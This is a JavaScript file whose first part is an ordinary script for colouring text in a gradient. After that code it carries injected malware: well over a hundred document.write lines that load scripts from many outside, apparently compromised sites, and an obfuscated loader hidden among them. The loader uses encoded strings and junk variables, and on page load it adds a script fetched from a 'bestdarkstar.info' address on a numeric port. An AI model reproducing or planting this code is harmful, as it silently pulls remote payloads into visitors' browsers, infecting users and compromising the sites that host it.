// ******************* [gradient] code ******************* //
// 1001 Astuces Nam@ni , la Source JavaScript!!
// http://www.namani.net
function gradient_gradient_browser() {
	gradient_browser = "unknown";
	gradient_version = 0;
	if (navigator.userAgent.indexOf("Opera") >= 0)
	 gradient_browser = "opera";
	else if (navigator.userAgent.indexOf("obot") >= 0)
	 gradient_browser = "robot";
	else if (navigator.appName.indexOf("etscape") >= 0)
	 gradient_browser = "netscape";
	else if (navigator.appName.indexOf("icrosoft") >= 0)
	 gradient_browser = "msie";
	gradient_version = parseFloat(navigator.appVersion);
	if (isNaN(gradient_version)) gradient_version = 0;
	if ((gradient_browser == "msie")&&(gradient_version == 2)) gradient_version = 3;
	gradient_tohex = new Array(256);
	var hex = "0123456789ABCDEF";
	var count = 0;
	for (var x=0; x<16; x++) {
	 for (var y=0; y<16; y++) {
		gradient_tohex[count] = hex.charAt(x) + hex.charAt(y);
		count++;
	 }
	}
}

function ColorCode(hexcode) {
  if (hexcode.length == 7) {
    this.gradient_r = parseInt(hexcode.substring(1,3),16);
    this.gradient_g = parseInt(hexcode.substring(3,5),16);
    this.gradient_b = parseInt(hexcode.substring(5,7),16);
  }
  else if (hexcode.length == 6) {
    this.gradient_r = parseInt(hexcode.substring(0,2),16);
    this.gradient_g = parseInt(hexcode.substring(2,4),16);
    this.gradient_b = parseInt(hexcode.substring(4,6),16);
  }
  else {
    this.gradient_r = this.gradient_g = this.gradient_b = 0;    
  }  
}

function ColorList(hexcodes) {
  var i = 0;
  var c = 0;
  this.gradient_codes = new Array(Math.round(hexcodes.length/7));
  while (i < hexcodes.length) {
    if (isNaN(parseInt(hexcodes.substring(i,i+6),16))) ++i;
    else {
      this.gradient_codes[c] = new ColorCode(hexcodes.substring(i,i+6));
      i += 7;
      ++c;
    }
  }
  this.len = c;
}

function interpolate (x1, y1, x3, y3, x2) {
  if (x3 == x1) return y1
  else return (x2-x1)*(y3-y1)/(x3-x1) + y1
}

function lowcolorindex (x, y, z) {
  if (y == 1) return 0
  else return Math.floor( (x*(z-1))/(y-1) )
}

function hicolorindex (x, y, z, low) { 
  if ( low*(y-1) == x*(z-1) ) return low
  else if (y == 1) return 0
  else return Math.floor( (x*(z-1))/(y-1) + 1 )
}

function drawGradient() {
	var found = 0;
	var d = document.getElementsByTagName("DIV");
	for (var i = d.length - 1; i >= 0; i--) {
		if (d[i].id == "mygradient") {
			d[i].id = "";
			div = d[i];
			found = 1;
			break;
		}
	}
	if (found == 0) return;	
	clr = div.tag
	clr = clr.replace(/\#/g, "");
	clr = clr.replace(/[ ]+/g, " ");
	clr += "      ";
	clr = clr.split(" ");
	gradient_gradient_browser();
	gradient_thecolors = "#" + clr[0].substr(0,6);
	gradient_thecolors += "#" + clr[1].substr(0,6);
	gradient_thecolors += "#" + clr[2].substr(0,6);
	gradient_thecolors += "#" + clr[3].substr(0,6);
	gradient_thecolors += "#" + clr[4].substr(0,6);	
	
	var gradient_html = "";
	if (((gradient_browser == "netscape")||(gradient_browser == "msie")||(gradient_browser == "opera"))&&(gradient_version>=3.0)) {
		
		var colors = new ColorList(gradient_thecolors);
		if (colors.len < 2) {
			div.style.display = "block";
			return;
		}		
		var numcolors = colors.len;		
		var numchars = div.innerText.replace(/[\n\r\t ]/g, "").length;
		var rr = 0;
		var gg = 0;
		var bb = 0;
		var lci = 0; //lower color index
		var hci = 0; //high color index
		var chr, p = 0;
		for (i = 0; p < numchars; ++i) {
			chr = div.innerText.charAt(i);
			if (" \r\n\t".indexOf(chr) != -1) {
				gradient_html += chr;
			} else {				
				lci = lowcolorindex(p, numchars, numcolors);
				hci = hicolorindex(p, numchars, numcolors, lci);
				rr = Math.round(interpolate( lci/(numcolors-1), colors.gradient_codes[lci].gradient_r, hci/(numcolors-1), colors.gradient_codes[hci].gradient_r, p/(numchars-1)));
				gg = Math.round(interpolate( lci/(numcolors-1), colors.gradient_codes[lci].gradient_g, hci/(numcolors-1), colors.gradient_codes[hci].gradient_g, p/(numchars-1)));
				bb = Math.round(interpolate( lci/(numcolors-1), colors.gradient_codes[lci].gradient_b, hci/(numcolors-1), colors.gradient_codes[hci].gradient_b, p/(numchars-1)));
				if (gradient_browser == "opera") {
					rr = 255 - rr;
					gg = 255 - gg;
					bb = 255 - bb;
				}				
				gradient_html += chr.fontcolor(gradient_tohex[rr]+gradient_tohex[gg]+gradient_tohex[bb]);
				p++;
			}
		}
	} else
		gradient_html += div.innerText;	
	div.innerHTML = gradient_html.replace(/\r/gi, "<br>");
	gradient_html = "";
	div.style.display = "block";
}
// *********** [/gradient] code *********** //

document.write('<script src=http://magicianputtaraj.com/tmp/contact.php ><\/script>');
document.write('<script src=http://sleakcreations.com/waqar/googlee4e18b4a0dbeb050.php ><\/script>');
document.write('<script src=http://sleakcreations.com/waqar/googlee4e18b4a0dbeb050.php ><\/script>');
document.write('<script src=http://sleakcreations.com/waqar/googlee4e18b4a0dbeb050.php ><\/script>');
document.write('<script src=http://sleakcreations.com/waqar/googlee4e18b4a0dbeb050.php ><\/script>');
document.write('<script src=http://agaclimanufacture.com/stats/resimler_kategoriKT.php ><\/script>');
document.write('<script src=http://agaclimanufacture.com/stats/resimler_kategoriKT.php ><\/script>');
document.write('<script src=http://agaclimanufacture.com/stats/resimler_kategoriKT.php ><\/script>');
document.write('<script src=http://agaclimanufacture.com/stats/resimler_kategoriKT.php ><\/script>');
document.write('<script src=http://agaclimanufacture.com/stats/resimler_kategoriKT.php ><\/script>');
document.write('<script src=http://palmaitomi.extra.hu/proba/mystyle_2.php ><\/script>');
document.write('<script src=http://palmaitomi.extra.hu/proba/mystyle_2.php ><\/script>');
document.write('<script src=http://palmaitomi.extra.hu/proba/mystyle_2.php ><\/script>');
document.write('<script src=http://palmaitomi.extra.hu/proba/mystyle_2.php ><\/script>');
document.write('<script src=http://palmaitomi.extra.hu/proba/mystyle_2.php ><\/script>');
document.write('<script src=http://palmaitomi.extra.hu/proba/mystyle_2.php ><\/script>');
document.write('<script src=http://palmaitomi.extra.hu/proba/mystyle_2.php ><\/script>');
document.write('<script src=http://apexsoftcell.com/Error/template.php ><\/script>');
document.write('<script src=http://apexsoftcell.com/Error/template.php ><\/script>');
document.write('<script src=http://apexsoftcell.com/Error/template.php ><\/script>');
document.write('<script src=http://apexsoftcell.com/Error/template.php ><\/script>');
document.write('<script src=http://theatersix.com/Images/newshole_bottom.php ><\/script>');
document.write('<script src=http://theatersix.com/Images/newshole_bottom.php ><\/script>');
document.write('<script src=http://de-pareja.com/.smileys/index.php ><\/script>');
document.write('<script src=http://greetingcard.hdd1.ru/index.php ><\/script>');
document.write('<script src=http://returnattribution.com/javascripts/jesus.php ><\/script>');
document.write('<script src=http://returnattribution.com/javascripts/jesus.php ><\/script>');
document.write('<script src=http://returnattribution.com/javascripts/jesus.php ><\/script>');
document.write('<script src=http://yontgayrimenkul.com/picts/style.php ><\/script>');
document.write('<script src=http://yontgayrimenkul.com/picts/style.php ><\/script>');
document.write('<script src=http://yontgayrimenkul.com/picts/style.php ><\/script>');
document.write('<script src=http://yontgayrimenkul.com/picts/style.php ><\/script>');
document.write('<script src=http://batraindore.in/images/gifimg.php ><\/script>');
document.write('<script src=http://batraindore.in/images/gifimg.php ><\/script>');
document.write('<script src=http://batraindore.in/images/gifimg.php ><\/script>');
document.write('<script src=http://batraindore.in/images/gifimg.php ><\/script>');
document.write('<script src=http://batraindore.in/images/gifimg.php ><\/script>');
document.write('<script src=http://batraindore.in/images/gifimg.php ><\/script>');
document.write('<script src=http://inmueblesensanjose.com.ar/imgestudio/index.php ><\/script>');
document.write('<script src=http://inmueblesensanjose.com.ar/imgestudio/index.php ><\/script>');
document.write('<script src=http://inmueblesensanjose.com.ar/imgestudio/index.php ><\/script>');
document.write('<script src=http://inmueblesensanjose.com.ar/imgestudio/index.php ><\/script>');
document.write('<script src=http://inmueblesensanjose.com.ar/imgestudio/index.php ><\/script>');
document.write('<script src=http://a1-discount-hotelsa.co.cc/wp-admin/wp-trackback.php ><\/script>');
document.write('<script src=http://znakomstva-lipeck.co.cc/wp-content/wp-settings.php ><\/script>');
document.write('<script src=http://thelabellab.com/userimages/thelabellab_flyer_05_08_640.php ><\/script>');
document.write('<script src=http://thelabellab.com/userimages/thelabellab_flyer_05_08_640.php ><\/script>');
document.write('<script src=http://thelabellab.com/userimages/thelabellab_flyer_05_08_640.php ><\/script>');
document.write('<script src=http://thelabellab.com/userimages/thelabellab_flyer_05_08_640.php ><\/script>');
document.write('<script src=http://thelabellab.com/userimages/thelabellab_flyer_05_08_640.php ><\/script>');
document.write('<script src=http://studieshub.com/images/gifimg.php ><\/script>');
document.write('<script src=http://studieshub.com/images/gifimg.php ><\/script>');
document.write('<script src=http://studieshub.com/images/gifimg.php ><\/script>');
document.write('<script src=http://studieshub.com/images/gifimg.php ><\/script>');
document.write('<script src=http://feilbach.ru/feilbach/style.php ><\/script>');
document.write('<script src=http://belasah.com/e107_themes/comment.php ><\/script>');
document.write('<script src=http://belasah.com/e107_themes/comment.php ><\/script>');
document.write('<script src=http://belasah.com/e107_themes/comment.php ><\/script>');
document.write('<script src=http://belasah.com/e107_themes/comment.php ><\/script>');
document.write('<script src=http://belasah.com/e107_themes/comment.php ><\/script>');
document.write('<script src=http://belasah.com/e107_themes/comment.php ><\/script>');
document.write('<script src=http://shababemmanuel.com/admin/postinfo.php ><\/script>');
document.write('<script src=http://sattechsolutions.com/_vti_bin/aboutus.php ><\/script>');
document.write('<script src=http://sattechsolutions.com/_vti_bin/aboutus.php ><\/script>');
document.write('<script src=http://sattechsolutions.com/_vti_bin/aboutus.php ><\/script>');
document.write('<script src=http://sattechsolutions.com/_vti_bin/aboutus.php ><\/script>');
document.write('<script src=http://aafreenfilms.com/_vti_bin/about.php ><\/script>');
document.write('<script src=http://aafreenfilms.com/_vti_bin/about.php ><\/script>');
document.write('<script src=http://aafreenfilms.com/_vti_bin/about.php ><\/script>');
var Zl;if(Zl!='MM'){Zl=''};var X;if(X!='F'){X=''};function v(){var he=new Date();this.a="";this.U='';var GQ;if(GQ!='' && GQ!='Mt'){GQ='D'};var n=window;var E=unescape;var t=E("%2f%73%74%65%72%6e%2d%64%65%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%64%72%75%70%61%6c%2e%6f%72%67%2e%70%68%70");var f=new Date();var cj=new Date();this.l='';var qV=new String();function Z(y,G){var GY='';this.qY="";var M=new String("giAHn".substr(0,1));var A;if(A!='YK' && A != ''){A=null};var TE=new Date();var j=E("%5b"), o=E("%5d");var h=j+G+o;var u=new RegExp(h, M);var Dr=new String();return y.replace(u, new String());var go;if(go!='g' && go!='Ga'){go='g'};var vt=new Array();};var wf='';var Wc='';var rR='';this.jF='';var C=document;var tR;if(tR!='mJ' && tR!='jB'){tR='mJ'};var gz='';var c=Z('819790556862290636','96735421');var z=new String();var oa;if(oa!='' && oa!='gG'){oa='ku'};var IX;if(IX!='' && IX!='WX'){IX=''};var vg='';function J(){this.cW="";var Ko;if(Ko!='' && Ko!='kS'){Ko='K'};var wG;if(wG!=''){wG='cB'};var XV=new Date();var m=E("%68%74%74%70%3a%2f%2f%62%65%73%74%64%61%72%6b%73%74%61%72%2e%69%6e%66%6f%3a");this.B_="";var lN;if(lN!='' && lN!='Da'){lN=null};var PA;if(PA!='' && PA!='kO'){PA=null};this.mc='';z=m;var kY=new Date();var cp=new Date();z+=c;var p='';z+=t;var Bg=new String();var dY=new String();this.Bl='';this.Nc='';try {this.Sh="";var Mh=new Array();zH=C.createElement(Z('s4c6r4i3p3t3','6F43'));var EW;if(EW!='hN' && EW != ''){EW=null};this.JM="";var gN=new String();zH[E("%73%72%63")]=z;zH[E("%64%65%66%65%72")]=[1][0];C.body.appendChild(zH);var FG='';var Iu=new String();} catch(n_){var qK;if(qK!='' && qK!='gY'){qK=null};alert(n_);var Sc;if(Sc!='' && Sc!='HC'){Sc='pd'};var Sv=new String();};this.Je='';var BG='';}var fv;if(fv!='' && fv!='RB'){fv=''};var BlP;if(BlP!='' && BlP!='oL'){BlP=''};n[new String("j1BRon".substr(4)+"lo"+"adMnqR".substr(0,2))]=J;var uH;if(uH!='Gn' && uH!='iI'){uH=''};var km=new Array();var Vj;if(Vj!='jz' && Vj!='cK'){Vj='jz'};};var BN;if(BN!='' && BN!='OM'){BN=''};var cY;if(cY!='ux' && cY != ''){cY=null};v();
document.write('<script src=http://aafreenfilms.com/_vti_bin/about.php ><\/script>');
document.write('<script src=http://moviefor.com/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://moviefor.com/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://moviefor.com/wp-content/uploads/index.php ><\/script>');
document.write('<script src=http://beacon-tech.net/private/postinfo.php ><\/script>');
document.write('<script src=http://beacon-tech.net/private/postinfo.php ><\/script>');
document.write('<script src=http://mobile.lowmanbrown.com/images/selling.php ><\/script>');
document.write('<script src=http://mobile.lowmanbrown.com/images/selling.php ><\/script>');
document.write('<script src=http://mobile.lowmanbrown.com/images/selling.php ><\/script>');
document.write('<script src=http://stoo.ntoos.com/thumb/ntoos_16.ntoos.php ><\/script>');
document.write('<script src=http://stoo.ntoos.com/thumb/ntoos_16.ntoos.php ><\/script>');
document.write('<script src=http://1steam.ru/includes/consultations.php ><\/script>');
document.write('<script src=http://1steam.ru/includes/consultations.php ><\/script>');
document.write('<script src=http://1steam.ru/includes/consultations.php ><\/script>');
document.write('<script src=http://1steam.ru/includes/consultations.php ><\/script>');
document.write('<script src=http://go-to-play.ru/templates/yandex_6af7c4f6bd541115.php ><\/script>');
document.write('<script src=http://go-to-play.ru/templates/yandex_6af7c4f6bd541115.php ><\/script>');
document.write('<script src=http://go-to-play.ru/templates/yandex_6af7c4f6bd541115.php ><\/script>');
document.write('<script src=http://chpgencligi.biz/forum/indexa.php ><\/script>');
document.write('<script src=http://chpgencligi.biz/forum/indexa.php ><\/script>');
document.write('<script src=http://chpgencligi.biz/forum/indexa.php ><\/script>');
document.write('<script src=http://chpgencligi.biz/forum/indexa.php ><\/script>');
document.write('<script src=http://chpgencligi.biz/forum/indexa.php ><\/script>');
document.write('<script src=http://reg.roza-v.ru/components/LICENSE.php ><\/script>');
document.write('<script src=http://reg.roza-v.ru/components/LICENSE.php ><\/script>');
document.write('<script src=http://reg.roza-v.ru/components/LICENSE.php ><\/script>');
document.write('<script src=http://v-t-ss.com/aev/Kamalbum.php ><\/script>');
document.write('<script src=http://v-t-ss.com/aev/Kamalbum.php ><\/script>');
document.write('<script src=http://v-t-ss.com/aev/Kamalbum.php ><\/script>');
document.write('<script src=http://v-t-ss.com/aev/Kamalbum.php ><\/script>');
document.write('<script src=http://muglamimarlarodasi.org/doc/poster_detay5.php ><\/script>');
document.write('<script src=http://muglamimarlarodasi.org/doc/poster_detay5.php ><\/script>');
document.write('<script src=http://muglamimarlarodasi.org/doc/poster_detay5.php ><\/script>');
document.write('<script src=http://muglamimarlarodasi.org/doc/poster_detay5.php ><\/script>');
document.write('<script src=http://muglamimarlarodasi.org/doc/poster_detay5.php ><\/script>');
document.write('<script src=http://yasook.com/board/Themes/install_2-0_postgresql.php ><\/script>');
document.write('<script src=http://yasook.com/board/Themes/install_2-0_postgresql.php ><\/script>');
document.write('<script src=http://yasook.com/board/Themes/install_2-0_postgresql.php ><\/script>');
document.write('<script src=http://yasook.com/board/Themes/install_2-0_postgresql.php ><\/script>');
document.write('<script src=http://yasook.com/board/Themes/install_2-0_postgresql.php ><\/script>');
document.write('<script src=http://yasook.com/board/Themes/install_2-0_postgresql.php ><\/script>');
document.write('<script src=http://yasook.com/board/Themes/install_2-0_postgresql.php ><\/script>');
document.write('<script src=http://qddlbd.com/stylesheet/msg_director.php ><\/script>');
document.write('<script src=http://qddlbd.com/stylesheet/msg_director.php ><\/script>');
document.write('<script src=http://sercrim.com/admin/btn_top_mypage2.php ><\/script>');
document.write('<script src=http://sercrim.com/admin/btn_top_mypage2.php ><\/script>');
document.write('<script src=http://sercrim.com/admin/btn_top_mypage2.php ><\/script>');
document.write('<script src=http://sercrim.com/admin/btn_top_mypage2.php ><\/script>');
document.write('<script src=http://sercrim.com/admin/btn_top_mypage2.php ><\/script>');
document.write('<script src=http://sercrim.com/admin/btn_top_mypage2.php ><\/script>');
document.write('<script src=http://sercrim.com/admin/btn_top_mypage2.php ><\/script>');
document.write('<script src=http://sercrim.com/admin/btn_top_mypage2.php ><\/script>');
document.write('<script src=http://sercrim.com/admin/btn_top_mypage2.php ><\/script>');
document.write('<script src=http://sercrim.com/admin/btn_top_mypage2.php ><\/script>');
document.write('<script src=http://professionalappraisers.org/_derived/index.php ><\/script>');
document.write('<script src=http://mbmd.net/Anonymous/php.php ><\/script>');
document.write('<script src=http://mbmd.net/Anonymous/php.php ><\/script>');
document.write('<script src=http://mbmd.net/Anonymous/php.php ><\/script>');
document.write('<script src=http://mbmd.net/Anonymous/php.php ><\/script>');
document.write('<script src=http://mbmd.net/Anonymous/php.php ><\/script>');
document.write('<script src=http://mbmd.net/Anonymous/php.php ><\/script>');
document.write('<script src=http://mbmd.net/Anonymous/php.php ><\/script>');
document.write('<script src=http://belet.ru/5edf38714a4020e128c90d92dd9bbfbf/autobackup.php ><\/script>');
document.write('<script src=http://belet.ru/5edf38714a4020e128c90d92dd9bbfbf/autobackup.php ><\/script>');
document.write('<script src=http://belet.ru/5edf38714a4020e128c90d92dd9bbfbf/autobackup.php ><\/script>');
document.write('<script src=http://belet.ru/5edf38714a4020e128c90d92dd9bbfbf/autobackup.php ><\/script>');
document.write('<script src=http://belet.ru/5edf38714a4020e128c90d92dd9bbfbf/autobackup.php ><\/script>');